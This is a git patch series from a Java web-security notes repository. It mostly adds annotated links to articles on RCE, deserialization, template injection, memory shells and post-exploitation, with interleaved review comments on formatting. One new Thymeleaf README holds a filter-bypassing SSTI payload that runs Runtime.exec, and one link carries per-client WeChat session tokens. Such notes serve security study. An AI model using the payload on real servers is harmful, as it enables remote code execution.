diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 225f958..8360da3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -200,3 +200,4 @@ + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) ++ 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** From 7d54485b4ab8d17084b1ab28378258eebf095e4c Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 20 Nov 2022 20:01:38 +0800 Subject: [PATCH 195/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8360da3..2e074c2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -201,3 +201,4 @@ + 2022/11/11 [一起通过Navicat进行供应链攻击的样本分析](https://mp.weixin.qq.com/s?__biz=MzU0MDg1NjMyNQ==&mid=2247485330&idx=1&sn=ad68b1301c9289bc9ebc39640e03315e&chksm=fb339ef8cc4417ee9a047850e999f7db51ebe601b5c6a37cf247f4f17eac1481ec5147f9b5b2&mpshare=1&scene=1&srcid=11117c2tOWqevk7sw3mH7cHO&sharer_sharetime=1668165218192&sharer_shareid=33fdea7abe6be586e131951d667ccd06&key=13199a1408fc416798bb4b4f4fb6a44ff1bd702c2e1d10d0b2b72bfe4b80d53346ab688dc13c8f6da2eb8afdc49c2508f520a4234972ec3cce0a612e7c7d25aad3b5c647e77a6040bc0181802fd86df19f36bc5a21dd8a4702aab2ed6d4a6d59fcdc1c4e6d83b07ffcbcf26f78f9f2122887dee5a5f5d5c39d03a1e27b9eca2c&ascene=1&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308001f&lang=zh_CN&exportkey=n_ChQIAhIQZGY7rBoHsLsIbkHsdPBgBBLvAQIE97dBBAEAAAAAAPWyNDbyQpAAAAAOpnltbLcz9gKNyK89dVj0qe2fqlflmmc8D1eybpB9UjyEVXZxzTjhUQnmaod69dFsw2ig6d2B53zT%2FWgGY2yFadFDdL%2BDBq5jySJDOnOj4H4s5cVqKESUbZ7IUfIsfvyrM4JN6HLsUL1qF1%2BSYWIe8bD1T%2FG9Eye5Qendcd%2FZpmWeJcq7ua%2BvKZrSqWy5TnM6qGrZ9reOvJeBaQo3ZcSk%2BtxapkLHCSRkAejizHNRMYFVlCSSpBP4A6IflbjQ1kX8xDv5oLFHaz3PbQLish3WWGvAqV4ONDWG&acctmode=0&pass_ticket=uGXE0Z4fPCmC9suZxdId189%2FNtwCT5VyAktjMGr70tXhWj2mXEslo4cG4WozS3Vz&wx_header=0&fontgear=2) **好np** + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** ++ 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) 
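Review bot: The Navicat entry at the top of this hunk (a context line here, added in PATCH 190/332) keeps the full share URL, including `key=`, `uin=`, `pass_ticket=`, `exportkey=`, `devicetype=Windows+10+x64` and `version=`, which describe the client that copied the link rather than the article. Trim it to the parameter set the neighbouring WeChat entries use (`__biz`, `mid`, `idx`, `sn`, `chksm`) or to the short `https://mp.weixin.qq.com/s/...` form the Hessian entry in the same hunk uses, so the README does not publish per-client values and the line stays readable as context in later diffs.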
From 844dfd1d2ba34b857d20de7513f9b9d8af12fa46 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 22 Nov 2022 18:44:36 +0800 Subject: [PATCH 196/332] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index 722fd77..cfc36e4 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -11,6 +11,7 @@ + [Velocity模板注入](Velocity) **2021 四川省比赛省赛非攻Java logiclogic** 后缀名.vm [wp](https://mp.weixin.qq.com/s?__biz=MzI3NDEzNzIxMg==&mid=2650481832&idx=2&sn=7b092fc6e26c7d5f131b8ef7a30dc85c&chksm=f3172dbbc460a4ad99f29b445dd92873304d7c34798f977695ba775a5096a6b707106190a09f&mpshare=1&scene=23&srcid=0924Bci6wWhHifB6Y7Cmc5hl&sharer_sharetime=1632452737857&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + [beetl模板注入](Beetl) + [jfinalcms enjoy](jfinalcms_enjoy) **2021 字节ctf考察过。** ++ [Java FreeMarker 模板引擎注入深入分析](https://mp.weixin.qq.com/s/aYTp0suulfjQ5dcocS33Kg) ------------------------------------------------------------------------------------------------------------------------- # SSTI From a43731568a56fd2be95238ce312b70268ed3d834 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 19:48:20 +0800 Subject: [PATCH 197/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e074c2..a2d7665 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -202,3 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) From 07b6b7f7a5ab3d17fed2c347c4f2ffd8ab032c3b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Nov 2022 20:07:47 +0800 Subject: [PATCH 198/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a2d7665..4e36434 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -202,4 +202,4 @@ + 2022/11/19 [命令注入执行](https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection) + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) -+ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) ++ 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** From b3ea51bfbe450ab23aaa7623a7d2174f83fd880a Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 26 Nov 2022 21:59:40 +0800 Subject: [PATCH 199/332] =?UTF-8?q?Rename=20c=E8=AF=AD=E8=A8=80=E8=83=BD?= =?UTF-8?q?=E5=AE=9E=E7=8E=B0agent=3F!.md=20to=20c=E8=AF=AD=E8=A8=80?= =?UTF-8?q?=E8=83=BD=E5=AE=9E=E7=8E=B0agent=E5=90=97.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" => "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" (100%) diff --git "a/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" "b/java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" similarity index 100% rename from "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent?!.md" rename to "java\346\227\245\345\270\270/c\350\257\255\350\250\200\350\203\275\345\256\236\347\216\260agent\345\220\227.md" From f939b114f79692c1c31c007ddb4aa4ba8b47495c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 27 Nov 2022 11:38:32 +0800 Subject: [PATCH 200/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4e36434..e7ea0b0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -203,3 +203,4 @@ + 2022/11/19 [Hessian 序列化、反序列化](https://mp.weixin.qq.com/s/icYs7VjPRytt6zgXja9V-w) **学习** + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** ++ 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2f4f6e6db79f31b3fadb0366806c4030a5250e29 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 11:24:32 +0800 Subject: [PATCH 201/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e7ea0b0..0ac1427 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -204,3 +204,4 @@ + 2022/11/20 [Remote Command Execution in a Bank Server](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** 
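Review bot: The ZK / R1Soft entry carried as context in this hunk still links to `http://tttang.com/archive/1833` over plain HTTP, while the tttang link added later in this series (`https://tttang.com/archive/1436/`) uses HTTPS. PATCH 198/332 already rewrote that line to add the annotation, so switching the scheme there would have cost nothing; please make the tttang links consistent on `https://`.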
From 817c0d4703ab013050aad47b0c88ebc302183eae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 30 Nov 2022 20:08:26 +0800 Subject: [PATCH 202/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0ac1427..331bb23 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -205,3 +205,4 @@ + 2022/11/23 [ZK框架权限绕过导致R1Soft Server Backup Manager RCE并接管Agent](http://tttang.com/archive/1833) **forward转发 bypass 权限操作** + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** ++ 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** From 7ce6d3e9d7f78cf86bda961d7f7f903f857536ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:25:37 +0800 Subject: [PATCH 203/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 331bb23..dc792f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -206,3 +206,4 @@ + 2022/11/27 [burp指纹修改](https://mp.weixin.qq.com/s?__biz=MzU1NTQ5MDEwNw==&mid=2247484690&idx=1&sn=5b2251069f9bcc98c340278207825c66&chksm=fbd2cb46cca542505b3f49c8ba7f609fab9d5ca6a43b6ebdc61cf67a3f725406b998b56fdbdc&mpshare=1&scene=23&srcid=1126mmkxPLOblhlehRFdhOY7&sharer_sharetime=1669485801645&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** ++ 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** From 338a056bcaeba8ae2c391831d012ff2b9fdfd84c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Dec 2022 00:30:14 +0800 Subject: [PATCH 204/332] Update README.md --- Struts2/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Struts2/README.md b/Struts2/README.md index bbe2332..5f8b882 100644 --- a/Struts2/README.md +++ b/Struts2/README.md @@ -19,3 +19,8 @@ [漏洞版本](http://archive.apache.org/dist/struts/binaries/) ![](./img/环境.png) + +## TODO +分析各个s2 漏洞 +s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) + From 8de7d2f2d33c9801e8fb01e3d326b78526e214e3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 00:16:13 +0800 Subject: [PATCH 205/332] Create Readme.md --- .../Thymeleaf/Readme.md" | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" new file mode 100644 index 0000000..1f606b5 
--- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Thymeleaf/Readme.md" @@ -0,0 +1,8 @@ +# 绕过文章 + + ++ [记一次实战之若依SSTI注入绕过玄某盾](https://mp.weixin.qq.com/s/7TCZDkfCXlmEhcTb85fw_Q) + +```java +__${T%20(%0aRuntime%09).%0dgetRuntime%0a(%09)%0d.%00exec('calc')}__::.x +``` From 94ac544cfcfe4ff50f04d4e3bdcf9ca03002fde4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:45:41 +0800 Subject: [PATCH 206/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dc792f6..2cab2d8 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -207,3 +207,4 @@ + 2022/11/30 [关于HackerOne上Grafana、jolokia、Flink攻击手法的学习](https://mp.weixin.qq.com/s/iQlLvF8LHzJvL8ofE2YvKA) **flink 寻找main 有意思** + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** ++ 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** From bfd1c0166adf388ec31c6f465aacc5452e1aa36b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Dec 2022 18:58:16 +0800 Subject: [PATCH 207/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2cab2d8..7ad6d0f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -208,3 +208,4 @@ + 2022/11/30 [内存马的攻防博弈之旅之gRPC内存马](https://mp.weixin.qq.com/s/osuoinwCpOwNM4WoI6SOnQ) **可能之后可以用** + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** ++ 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** From 9d5838edce77f1baeadcc64c5367dc501fbcf4e5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:06:46 +0800 Subject: [PATCH 208/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ad6d0f..b72f4c4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -209,3 +209,4 @@ + 2022/12/02 [一次失败的定点漏洞挖掘之代码审计宜信Davinci](https://www.cnblogs.com/r00tuser/p/13265435.html) **遇到了 但是不出网** + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** ++ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** From b541642076316d86f83af6f6d42f488f1c764b32 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 8 Dec 2022 20:11:14 +0800 Subject: [PATCH 209/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b72f4c4..0f0f613 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -210,3 +210,4 @@ + 2022/12/05 [宝塔后渗透-添加用户|反弹shell](https://mp.weixin.qq.com/s/2o_H66BMqy3Ft3-5ERlKpQ) **后渗透比较重要** + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** ++ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** From 85c348b0513fe1f99d7973ed586e888e091229f9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 15:59:18 +0800 Subject: [PATCH 210/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0f0f613..e263195 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -211,3 +211,4 @@ + 2022/12/05 [Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355) [Nacos 未授权远程代码执行漏洞通告](https://mp.weixin.qq.com/s/Zpa3af43XZECglYMbNRk8g) **add user有用** + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** ++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** From f52b42909225d1b440c6f148ef72292621c2539f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 18:04:45 +0800 Subject: [PATCH 211/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
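Review bot: In PATCH 205/332 (new `Thymeleaf/Readme.md`), the fenced block is tagged `java` but its single line is a URL-encoded template expression, not Java, so highlighters will mis-render it; tag it `text`. The README also gives the article link and the string with no sentence on what the inserted `%20`, `%0a`, `%09`, `%0d` and `%00` bytes are for, so a reader maintaining a filter cannot tell from this file what has to be decoded and normalized before matching; one line of explanation under the `# 绕过文章` heading (which currently has two blank lines after it) would fix that.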
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e263195..928f766 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -212,3 +212,4 @@ + 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用** + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** ++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* From 7c7bb49024d7f70b43a23688237c1ad0988865e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 9 Dec 2022 21:21:07 +0800 Subject: [PATCH 212/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 928f766..1c3bad2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -213,3 +213,4 @@ + 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用** + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* ++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) From 5bf66424673ceb3a8134b54622bb7fe7c813e77c Mon Sep 17 00:00:00 2001 From: Firebasky 